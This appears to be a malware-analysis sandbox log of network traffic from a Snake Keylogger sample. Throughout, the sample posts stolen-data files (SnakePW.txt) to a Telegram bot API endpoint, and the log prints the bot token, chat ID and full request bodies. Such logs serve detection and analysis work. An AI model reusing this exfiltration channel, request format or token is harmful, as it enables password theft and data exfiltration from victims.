                            Data Ascii: {"ok":true,"result":{"message_id":67081,"from":{"id":5392870078,"is_bot":true,"first_name":"Magicallogs","username":"Magicallogs_bot"},"chat":{"id":1856108848,"first_name":"Scott","last_name":"Clarke","type":"private"},"date":1656228884,"document":{"file_


                            Session IDSource IPSource PortDestination IPDestination PortProcess
                            295192.168.2.550229149.154.167.220443C:\Users\user\Desktop\0OZQi3b0tM.exe
                            TimestampkBytes transferredDirectionData
                            2022-06-26 07:34:44 UTC498OUTPOST /bot5392870078:AAEZf0ajeo_PMkBddeC_JE--NP4u4367N6c/sendDocument?chat_id=1856108848&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Keylogger%0D%0A%0D%0APW%20%7C%20user%20%7C%20Snake HTTP/1.1
                            Content-Type: multipart/form-data; boundary=------------------------8da57571aed5200
                            Host: api.telegram.org
                            Content-Length: 504
                            2022-06-26 07:34:44 UTC498OUTData Raw: 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 38 64 61 35 37 35 37 31 61 65 64 35 32 30 30 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 64 6f 63 75 6d 65 6e 74 22 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 53 6e 61 6b 65 50 57 2e 74 78 74 22 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 61 70 70 6c 69 63 61 74 69 6f 6e 2f 78 2d 6d 73 2d 64 6f 73 2d 65 78 65 63 75 74 61 62 6c 65 0d 0a 0d 0a 50 57 20 7c 20 61 6c 66 6f 6e 73 20 7c 20 53 6e 61 6b 65 0d 0a 20 0d 0a 0d 0a 50 43 20 4e 61 6d 65 3a 32 38 34 39 39 32 0d 0a 44 61 74 65 20 61 6e 64 20 54 69 6d 65 3a 20 36 2f 32 36 2f 32 30 32 32 20 2f 20 39 3a 33 32 3a 32 32 20 41 4d 0d 0a 43 6c 69 65 6e 74 20 49 50
                            Data Ascii: --------------------------8da57571aed5200Content-Disposition: form-data; name="document"; filename="SnakePW.txt"Content-Type: application/x-ms-dos-executablePW | user | Snake PC Name:284992Date and Time: 6/26/2022 / 9:32:22 AMClient IP
                            2022-06-26 07:34:45 UTC498INHTTP/1.1 200 OK
                            Server: nginx/1.18.0
                            Date: Sun, 26 Jun 2022 07:34:45 GMT
                            Content-Type: application/json
                            Content-Length: 507
                            Connection: close
                            Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                            Access-Control-Allow-Origin: *
                            Access-Control-Allow-Methods: GET, POST, OPTIONS
                            Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
                            2022-06-26 07:34:45 UTC499INData Raw: 7b 22 6f 6b 22 3a 74 72 75 65 2c 22 72 65 73 75 6c 74 22 3a 7b 22 6d 65 73 73 61 67 65 5f 69 64 22 3a 36 37 30 38 32 2c 22 66 72 6f 6d 22 3a 7b 22 69 64 22 3a 35 33 39 32 38 37 30 30 37 38 2c 22 69 73 5f 62 6f 74 22 3a 74 72 75 65 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 4d 61 67 69 63 61 6c 6c 6f 67 73 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 4d 61 67 69 63 61 6c 6c 6f 67 73 5f 62 6f 74 22 7d 2c 22 63 68 61 74 22 3a 7b 22 69 64 22 3a 31 38 35 36 31 30 38 38 34 38 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 53 63 6f 74 74 22 2c 22 6c 61 73 74 5f 6e 61 6d 65 22 3a 22 43 6c 61 72 6b 65 22 2c 22 74 79 70 65 22 3a 22 70 72 69 76 61 74 65 22 7d 2c 22 64 61 74 65 22 3a 31 36 35 36 32 32 38 38 38 35 2c 22 64 6f 63 75 6d 65 6e 74 22 3a 7b 22 66 69 6c 65 5f
                            Data Ascii: {"ok":true,"result":{"message_id":67082,"from":{"id":5392870078,"is_bot":true,"first_name":"Magicallogs","username":"Magicallogs_bot"},"chat":{"id":1856108848,"first_name":"Scott","last_name":"Clarke","type":"private"},"date":1656228885,"document":{"file_


                            Session IDSource IPSource PortDestination IPDestination PortProcess
                            296192.168.2.550230149.154.167.220443C:\Users\user\Desktop\0OZQi3b0tM.exe
                            TimestampkBytes transferredDirectionData
                            2022-06-26 07:34:45 UTC499OUTPOST /bot5392870078:AAEZf0ajeo_PMkBddeC_JE--NP4u4367N6c/sendDocument?chat_id=1856108848&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Keylogger%0D%0A%0D%0APW%20%7C%20user%20%7C%20Snake HTTP/1.1
                            Content-Type: multipart/form-data; boundary=------------------------8da57571b3739f6
                            Host: api.telegram.org
                            Content-Length: 504
                            2022-06-26 07:34:45 UTC500OUTData Raw: 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 38 64 61 35 37 35 37 31 62 33 37 33 39 66 36 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 64 6f 63 75 6d 65 6e 74 22 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 53 6e 61 6b 65 50 57 2e 74 78 74 22 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 61 70 70 6c 69 63 61 74 69 6f 6e 2f 78 2d 6d 73 2d 64 6f 73 2d 65 78 65 63 75 74 61 62 6c 65 0d 0a 0d 0a 50 57 20 7c 20 61 6c 66 6f 6e 73 20 7c 20 53 6e 61 6b 65 0d 0a 20 0d 0a 0d 0a 50 43 20 4e 61 6d 65 3a 32 38 34 39 39 32 0d 0a 44 61 74 65 20 61 6e 64 20 54 69 6d 65 3a 20 36 2f 32 36 2f 32 30 32 32 20 2f 20 39 3a 33 32 3a 32 32 20 41 4d 0d 0a 43 6c 69 65 6e 74 20 49 50
                            Data Ascii: --------------------------8da57571b3739f6Content-Disposition: form-data; name="document"; filename="SnakePW.txt"Content-Type: application/x-ms-dos-executablePW | user | Snake PC Name:284992Date and Time: 6/26/2022 / 9:32:22 AMClient IP
                            2022-06-26 07:34:45 UTC500INHTTP/1.1 200 OK
                            Server: nginx/1.18.0
                            Date: Sun, 26 Jun 2022 07:34:45 GMT
                            Content-Type: application/json
                            Content-Length: 507
                            Connection: close
                            Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                            Access-Control-Allow-Origin: *
                            Access-Control-Allow-Methods: GET, POST, OPTIONS
                            Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
                            2022-06-26 07:34:45 UTC501INData Raw: 7b 22 6f 6b 22 3a 74 72 75 65 2c 22 72 65 73 75 6c 74 22 3a 7b 22 6d 65 73 73 61 67 65 5f 69 64 22 3a 36 37 30 38 33 2c 22 66 72 6f 6d 22 3a 7b 22 69 64 22 3a 35 33 39 32 38 37 30 30 37 38 2c 22 69 73 5f 62 6f 74 22 3a 74 72 75 65 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 4d 61 67 69 63 61 6c 6c 6f 67 73 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 4d 61 67 69 63 61 6c 6c 6f 67 73 5f 62 6f 74 22 7d 2c 22 63 68 61 74 22 3a 7b 22 69 64 22 3a 31 38 35 36 31 30 38 38 34 38 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 53 63 6f 74 74 22 2c 22 6c 61 73 74 5f 6e 61 6d 65 22 3a 22 43 6c 61 72 6b 65 22 2c 22 74 79 70 65 22 3a 22 70 72 69 76 61 74 65 22 7d 2c 22 64 61 74 65 22 3a 31 36 35 36 32 32 38 38 38 35 2c 22 64 6f 63 75 6d 65 6e 74 22 3a 7b 22 66 69 6c 65 5f
                            Data Ascii: {"ok":true,"result":{"message_id":67083,"from":{"id":5392870078,"is_bot":true,"first_name":"Magicallogs","username":"Magicallogs_bot"},"chat":{"id":1856108848,"first_name":"Scott","last_name":"Clarke","type":"private"},"date":1656228885,"document":{"file_


                            Session IDSource IPSource PortDestination IPDestination PortProcess
                            297192.168.2.550231149.154.167.220443C:\Users\user\Desktop\0OZQi3b0tM.exe
                            TimestampkBytes transferredDirectionData
                            2022-06-26 07:34:45 UTC501OUTPOST /bot5392870078:AAEZf0ajeo_PMkBddeC_JE--NP4u4367N6c/sendDocument?chat_id=1856108848&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Keylogger%0D%0A%0D%0APW%20%7C%20user%20%7C%20Snake HTTP/1.1
                            Content-Type: multipart/form-data; boundary=------------------------8da57571b7072c5
                            Host: api.telegram.org
                            Content-Length: 504
                            2022-06-26 07:34:45 UTC501OUTData Raw: 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 38 64 61 35 37 35 37 31 62 37 30 37 32 63 35 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 64 6f 63 75 6d 65 6e 74 22 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 53 6e 61 6b 65 50 57 2e 74 78 74 22 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 61 70 70 6c 69 63 61 74 69 6f 6e 2f 78 2d 6d 73 2d 64 6f 73 2d 65 78 65 63 75 74 61 62 6c 65 0d 0a 0d 0a 50 57 20 7c 20 61 6c 66 6f 6e 73 20 7c 20 53 6e 61 6b 65 0d 0a 20 0d 0a 0d 0a 50 43 20 4e 61 6d 65 3a 32 38 34 39 39 32 0d 0a 44 61 74 65 20 61 6e 64 20 54 69 6d 65 3a 20 36 2f 32 36 2f 32 30 32 32 20 2f 20 39 3a 33 32 3a 32 32 20 41 4d 0d 0a 43 6c 69 65 6e 74 20 49 50
                            Data Ascii: --------------------------8da57571b7072c5Content-Disposition: form-data; name="document"; filename="SnakePW.txt"Content-Type: application/x-ms-dos-executablePW | user | Snake PC Name:284992Date and Time: 6/26/2022 / 9:32:22 AMClient IP
                            2022-06-26 07:34:45 UTC502INHTTP/1.1 200 OK
                            Server: nginx/1.18.0
                            Date: Sun, 26 Jun 2022 07:34:45 GMT
                            Content-Type: application/json
                            Content-Length: 507
                            Connection: close
                            Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                            Access-Control-Allow-Origin: *
                            Access-Control-Allow-Methods: GET, POST, OPTIONS
                            Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
                            2022-06-26 07:34:45 UTC502INData Raw: 7b 22 6f 6b 22 3a 74 72 75 65 2c 22 72 65 73 75 6c 74 22 3a 7b 22 6d 65 73 73 61 67 65 5f 69 64 22 3a 36 37 30 38 34 2c 22 66 72 6f 6d 22 3a 7b 22 69 64 22 3a 35 33 39 32 38 37 30 30 37 38 2c 22 69 73 5f 62 6f 74 22 3a 74 72 75 65 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 4d 61 67 69 63 61 6c 6c 6f 67 73 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 4d 61 67 69 63 61 6c 6c 6f 67 73 5f 62 6f 74 22 7d 2c 22 63 68 61 74 22 3a 7b 22 69 64 22 3a 31 38 35 36 31 30 38 38 34 38 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 53 63 6f 74 74 22 2c 22 6c 61 73 74 5f 6e 61 6d 65 22 3a 22 43 6c 61 72 6b 65 22 2c 22 74 79 70 65 22 3a 22 70 72 69 76 61 74 65 22 7d 2c 22 64 61 74 65 22 3a 31 36 35 36 32 32 38 38 38 35 2c 22 64 6f 63 75 6d 65 6e 74 22 3a 7b 22 66 69 6c 65 5f
                            Data Ascii: {"ok":true,"result":{"message_id":67084,"from":{"id":5392870078,"is_bot":true,"first_name":"Magicallogs","username":"Magicallogs_bot"},"chat":{"id":1856108848,"first_name":"Scott","last_name":"Clarke","type":"private"},"date":1656228885,"document":{"file_


                            Session IDSource IPSource PortDestination IPDestination PortProcess
                            298192.168.2.550232149.154.167.220443C:\Users\user\Desktop\0OZQi3b0tM.exe
                            TimestampkBytes transferredDirectionData
                            2022-06-26 07:34:46 UTC503OUTPOST /bot5392870078:AAEZf0ajeo_PMkBddeC_JE--NP4u4367N6c/sendDocument?chat_id=1856108848&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Keylogger%0D%0A%0D%0APW%20%7C%20user%20%7C%20Snake HTTP/1.1
                            Content-Type: multipart/form-data; boundary=------------------------8da57571ba9ab98
                            Host: api.telegram.org
                            Content-Length: 504
                            2022-06-26 07:34:46 UTC503OUTData Raw: 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 38 64 61 35 37 35 37 31 62 61 39 61 62 39 38 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 64 6f 63 75 6d 65 6e 74 22 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 53 6e 61 6b 65 50 57 2e 74 78 74 22 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 61 70 70 6c 69 63 61 74 69 6f 6e 2f 78 2d 6d 73 2d 64 6f 73 2d 65 78 65 63 75 74 61 62 6c 65 0d 0a 0d 0a 50 57 20 7c 20 61 6c 66 6f 6e 73 20 7c 20 53 6e 61 6b 65 0d 0a 20 0d 0a 0d 0a 50 43 20 4e 61 6d 65 3a 32 38 34 39 39 32 0d 0a 44 61 74 65 20 61 6e 64 20 54 69 6d 65 3a 20 36 2f 32 36 2f 32 30 32 32 20 2f 20 39 3a 33 32 3a 32 32 20 41 4d 0d 0a 43 6c 69 65 6e 74 20 49 50
                            Data Ascii: --------------------------8da57571ba9ab98Content-Disposition: form-data; name="document"; filename="SnakePW.txt"Content-Type: application/x-ms-dos-executablePW | user | Snake PC Name:284992Date and Time: 6/26/2022 / 9:32:22 AMClient IP
                            2022-06-26 07:34:46 UTC504INHTTP/1.1 200 OK
                            Server: nginx/1.18.0
                            Date: Sun, 26 Jun 2022 07:34:46 GMT
                            Content-Type: application/json
                            Content-Length: 507
                            Connection: close
                            Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                            Access-Control-Allow-Origin: *
                            Access-Control-Allow-Methods: GET, POST, OPTIONS
                            Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
                            2022-06-26 07:34:46 UTC504INData Raw: 7b 22 6f 6b 22 3a 74 72 75 65 2c 22 72 65 73 75 6c 74 22 3a 7b 22 6d 65 73 73 61 67 65 5f 69 64 22 3a 36 37 30 38 35 2c 22 66 72 6f 6d 22 3a 7b 22 69 64 22 3a 35 33 39 32 38 37 30 30 37 38 2c 22 69 73 5f 62 6f 74 22 3a 74 72 75 65 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 4d 61 67 69 63 61 6c 6c 6f 67 73 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 4d 61 67 69 63 61 6c 6c 6f 67 73 5f 62 6f 74 22 7d 2c 22 63 68 61 74 22 3a 7b 22 69 64 22 3a 31 38 35 36 31 30 38 38 34 38 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 53 63 6f 74 74 22 2c 22 6c 61 73 74 5f 6e 61 6d 65 22 3a 22 43 6c 61 72 6b 65 22 2c 22 74 79 70 65 22 3a 22 70 72 69 76 61 74 65 22 7d 2c 22 64 61 74 65 22 3a 31 36 35 36 32 32 38 38 38 36 2c 22 64 6f 63 75 6d 65 6e 74 22 3a 7b 22 66 69 6c 65 5f
                            Data Ascii: {"ok":true,"result":{"message_id":67085,"from":{"id":5392870078,"is_bot":true,"first_name":"Magicallogs","username":"Magicallogs_bot"},"chat":{"id":1856108848,"first_name":"Scott","last_name":"Clarke","type":"private"},"date":1656228886,"document":{"file_


                            Session IDSource IPSource PortDestination IPDestination PortProcess
                            299192.168.2.550233149.154.167.220443C:\Users\user\Desktop\0OZQi3b0tM.exe
                            TimestampkBytes transferredDirectionData
                            2022-06-26 07:34:46 UTC504OUTPOST /bot5392870078:AAEZf0ajeo_PMkBddeC_JE--NP4u4367N6c/sendDocument?chat_id=1856108848&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Keylogger%0D%0A%0D%0APW%20%7C%20user%20%7C%20Snake HTTP/1.1
                            Content-Type: multipart/form-data; boundary=------------------------8da57571be54603
                            Host: api.telegram.org
                            Content-Length: 504
                            2022-06-26 07:34:46 UTC505OUTData Raw: 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 38 64 61 35 37 35 37 31 62 65 35 34 36 30 33 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 64 6f 63 75 6d 65 6e 74 22 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 53 6e 61 6b 65 50 57 2e 74 78 74 22 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 61 70 70 6c 69 63 61 74 69 6f 6e 2f 78 2d 6d 73 2d 64 6f 73 2d 65 78 65 63 75 74 61 62 6c 65 0d 0a 0d 0a 50 57 20 7c 20 61 6c 66 6f 6e 73 20 7c 20 53 6e 61 6b 65 0d 0a 20 0d 0a 0d 0a 50 43 20 4e 61 6d 65 3a 32 38 34 39 39 32 0d 0a 44 61 74 65 20 61 6e 64 20 54 69 6d 65 3a 20 36 2f 32 36 2f 32 30 32 32 20 2f 20 39 3a 33 32 3a 32 32 20 41 4d 0d 0a 43 6c 69 65 6e 74 20 49 50
                            Data Ascii: --------------------------8da57571be54603Content-Disposition: form-data; name="document"; filename="SnakePW.txt"Content-Type: application/x-ms-dos-executablePW | user | Snake PC Name:284992Date and Time: 6/26/2022 / 9:32:22 AMClient IP
                            2022-06-26 07:34:46 UTC505INHTTP/1.1 200 OK
                            Server: nginx/1.18.0
                            Date: Sun, 26 Jun 2022 07:34:46 GMT
                            Content-Type: application/json
                            Content-Length: 507
                            Connection: close
                            Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                            Access-Control-Allow-Origin: *
                            Access-Control-Allow-Methods: GET, POST, OPTIONS
                            Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
                            2022-06-26 07:34:46 UTC506INData Raw: 7b 22 6f 6b 22 3a 74 72 75 65 2c 22 72 65 73 75 6c 74 22 3a 7b 22 6d 65 73 73 61 67 65 5f 69 64 22 3a 36 37 30 38 36 2c 22 66 72 6f 6d 22 3a 7b 22 69 64 22 3a 35 33 39 32 38 37 30 30 37 38 2c 22 69 73 5f 62 6f 74 22 3a 74 72 75 65 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 4d 61 67 69 63 61 6c 6c 6f 67 73 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 4d 61 67 69 63 61 6c 6c 6f 67 73 5f 62 6f 74 22 7d 2c 22 63 68 61 74 22 3a 7b 22 69 64 22 3a 31 38 35 36 31 30 38 38 34 38 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 53 63 6f 74 74 22 2c 22 6c 61 73 74 5f 6e 61 6d 65 22 3a 22 43 6c 61 72 6b 65 22 2c 22 74 79 70 65 22 3a 22 70 72 69 76 61 74 65 22 7d 2c 22 64 61 74 65 22 3a 31 36 35 36 32 32 38 38 38 36 2c 22 64 6f 63 75 6d 65 6e 74 22 3a 7b 22 66 69 6c 65 5f
                            Data Ascii: {"ok":true,"result":{"message_id":67086,"from":{"id":5392870078,"is_bot":true,"first_name":"Magicallogs","username":"Magicallogs_bot"},"chat":{"id":1856108848,"first_name":"Scott","last_name":"Clarke","type":"private"},"date":1656228886,"document":{"file_


                            Session IDSource IPSource PortDestination IPDestination PortProcess
                            3192.168.2.549771149.154.167.220443C:\Users\user\Desktop\0OZQi3b0tM.exe
                            TimestampkBytes transferredDirectionData
                            2022-06-26 07:32:39 UTC5OUTPOST /bot5392870078:AAEZf0ajeo_PMkBddeC_JE--NP4u4367N6c/sendDocument?chat_id=1856108848&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Keylogger%0D%0A%0D%0APW%20%7C%20user%20%7C%20Snake HTTP/1.1
                            Content-Type: multipart/form-data; boundary=------------------------8da5756d4fa25d0
                            Host: api.telegram.org
                            Content-Length: 504
                            2022-06-26 07:32:39 UTC5OUTData Raw: 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 38 64 61 35 37 35 36 64 34 66 61 32 35 64 30 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 64 6f 63 75 6d 65 6e 74 22 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 53 6e 61 6b 65 50 57 2e 74 78 74 22 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 61 70 70 6c 69 63 61 74 69 6f 6e 2f 78 2d 6d 73 2d 64 6f 73 2d 65 78 65 63 75 74 61 62 6c 65 0d 0a 0d 0a 50 57 20 7c 20 61 6c 66 6f 6e 73 20 7c 20 53 6e 61 6b 65 0d 0a 20 0d 0a 0d 0a 50 43 20 4e 61 6d 65 3a 32 38 34 39 39 32 0d 0a 44 61 74 65 20 61 6e 64 20 54 69 6d 65 3a 20 36 2f 32 36 2f 32 30 32 32 20 2f 20 39 3a 33 32 3a 32 32 20 41 4d 0d 0a 43 6c 69 65 6e 74 20 49 50
                            Data Ascii: --------------------------8da5756d4fa25d0Content-Disposition: form-data; name="document"; filename="SnakePW.txt"Content-Type: application/x-ms-dos-executablePW | user | Snake PC Name:284992Date and Time: 6/26/2022 / 9:32:22 AMClient IP
                            2022-06-26 07:32:39 UTC5INHTTP/1.1 200 OK
                            Server: nginx/1.18.0
                            Date: Sun, 26 Jun 2022 07:32:39 GMT
                            Content-Type: application/json
                            Content-Length: 507
                            Connection: close
                            Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                            Access-Control-Allow-Origin: *
                            Access-Control-Allow-Methods: GET, POST, OPTIONS
                            Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
                            2022-06-26 07:32:39 UTC6INData Raw: 7b 22 6f 6b 22 3a 74 72 75 65 2c 22 72 65 73 75 6c 74 22 3a 7b 22 6d 65 73 73 61 67 65 5f 69 64 22 3a 36 36 37 34 39 2c 22 66 72 6f 6d 22 3a 7b 22 69 64 22 3a 35 33 39 32 38 37 30 30 37 38 2c 22 69 73 5f 62 6f 74 22 3a 74 72 75 65 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 4d 61 67 69 63 61 6c 6c 6f 67 73 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 4d 61 67 69 63 61 6c 6c 6f 67 73 5f 62 6f 74 22 7d 2c 22 63 68 61 74 22 3a 7b 22 69 64 22 3a 31 38 35 36 31 30 38 38 34 38 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 53 63 6f 74 74 22 2c 22 6c 61 73 74 5f 6e 61 6d 65 22 3a 22 43 6c 61 72 6b 65 22 2c 22 74 79 70 65 22 3a 22 70 72 69 76 61 74 65 22 7d 2c 22 64 61 74 65 22 3a 31 36 35 36 32 32 38 37 35 39 2c 22 64 6f 63 75 6d 65 6e 74 22 3a 7b 22 66 69 6c 65 5f
                            Data Ascii: {"ok":true,"result":{"message_id":66749,"from":{"id":5392870078,"is_bot":true,"first_name":"Magicallogs","username":"Magicallogs_bot"},"chat":{"id":1856108848,"first_name":"Scott","last_name":"Clarke","type":"private"},"date":1656228759,"document":{"file_


                            Session IDSource IPSource PortDestination IPDestination PortProcess
                            30192.168.2.549799149.154.167.220443C:\Users\user\Desktop\0OZQi3b0tM.exe
                            TimestampkBytes transferredDirectionData
                            2022-06-26 07:32:50 UTC50OUTPOST /bot5392870078:AAEZf0ajeo_PMkBddeC_JE--NP4u4367N6c/sendDocument?chat_id=1856108848&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Keylogger%0D%0A%0D%0APW%20%7C%20user%20%7C%20Snake HTTP/1.1
                            Content-Type: multipart/form-data; boundary=------------------------8da5756db96eb51
                            Host: api.telegram.org
                            Content-Length: 504
                            2022-06-26 07:32:50 UTC51OUTData Raw: 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 38 64 61 35 37 35 36 64 62 39 36 65 62 35 31 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 64 6f 63 75 6d 65 6e 74 22 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 53 6e 61 6b 65 50 57 2e 74 78 74 22 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 61 70 70 6c 69 63 61 74 69 6f 6e 2f 78 2d 6d 73 2d 64 6f 73 2d 65 78 65 63 75 74 61 62 6c 65 0d 0a 0d 0a 50 57 20 7c 20 61 6c 66 6f 6e 73 20 7c 20 53 6e 61 6b 65 0d 0a 20 0d 0a 0d 0a 50 43 20 4e 61 6d 65 3a 32 38 34 39 39 32 0d 0a 44 61 74 65 20 61 6e 64 20 54 69 6d 65 3a 20 36 2f 32 36 2f 32 30 32 32 20 2f 20 39 3a 33 32 3a 32 32 20 41 4d 0d 0a 43 6c 69 65 6e 74 20 49 50
                            Data Ascii: --------------------------8da5756db96eb51Content-Disposition: form-data; name="document"; filename="SnakePW.txt"Content-Type: application/x-ms-dos-executablePW | user | Snake PC Name:284992Date and Time: 6/26/2022 / 9:32:22 AMClient IP
                            2022-06-26 07:32:50 UTC51INHTTP/1.1 200 OK
                            Server: nginx/1.18.0
                            Date: Sun, 26 Jun 2022 07:32:50 GMT
                            Content-Type: application/json
                            Content-Length: 507
                            Connection: close
                            Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                            Access-Control-Allow-Origin: *
                            Access-Control-Allow-Methods: GET, POST, OPTIONS
                            Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
                            2022-06-26 07:32:50 UTC51INData Raw: 7b 22 6f 6b 22 3a 74 72 75 65 2c 22 72 65 73 75 6c 74 22 3a 7b 22 6d 65 73 73 61 67 65 5f 69 64 22 3a 36 36 37 37 37 2c 22 66 72 6f 6d 22 3a 7b 22 69 64 22 3a 35 33 39 32 38 37 30 30 37 38 2c 22 69 73 5f 62 6f 74 22 3a 74 72 75 65 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 4d 61 67 69 63 61 6c 6c 6f 67 73 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 4d 61 67 69 63 61 6c 6c 6f 67 73 5f 62 6f 74 22 7d 2c 22 63 68 61 74 22 3a 7b 22 69 64 22 3a 31 38 35 36 31 30 38 38 34 38 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 53 63 6f 74 74 22 2c 22 6c 61 73 74 5f 6e 61 6d 65 22 3a 22 43 6c 61 72 6b 65 22 2c 22 74 79 70 65 22 3a 22 70 72 69 76 61 74 65 22 7d 2c 22 64 61 74 65 22 3a 31 36 35 36 32 32 38 37 37 30 2c 22 64 6f 63 75 6d 65 6e 74 22 3a 7b 22 66 69 6c 65 5f
                            Data Ascii: {"ok":true,"result":{"message_id":66777,"from":{"id":5392870078,"is_bot":true,"first_name":"Magicallogs","username":"Magicallogs_bot"},"chat":{"id":1856108848,"first_name":"Scott","last_name":"Clarke","type":"private"},"date":1656228770,"document":{"file_


                            Session IDSource IPSource PortDestination IPDestination PortProcess
                            300192.168.2.550234149.154.167.220443C:\Users\user\Desktop\0OZQi3b0tM.exe
                            TimestampkBytes transferredDirectionData
                            2022-06-26 07:34:46 UTC506OUTPOST /bot5392870078:AAEZf0ajeo_PMkBddeC_JE--NP4u4367N6c/sendDocument?chat_id=1856108848&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Keylogger%0D%0A%0D%0APW%20%7C%20user%20%7C%20Snake HTTP/1.1
                            Content-Type: multipart/form-data; boundary=------------------------8da57571c1e7e82
                            Host: api.telegram.org
                            Content-Length: 504
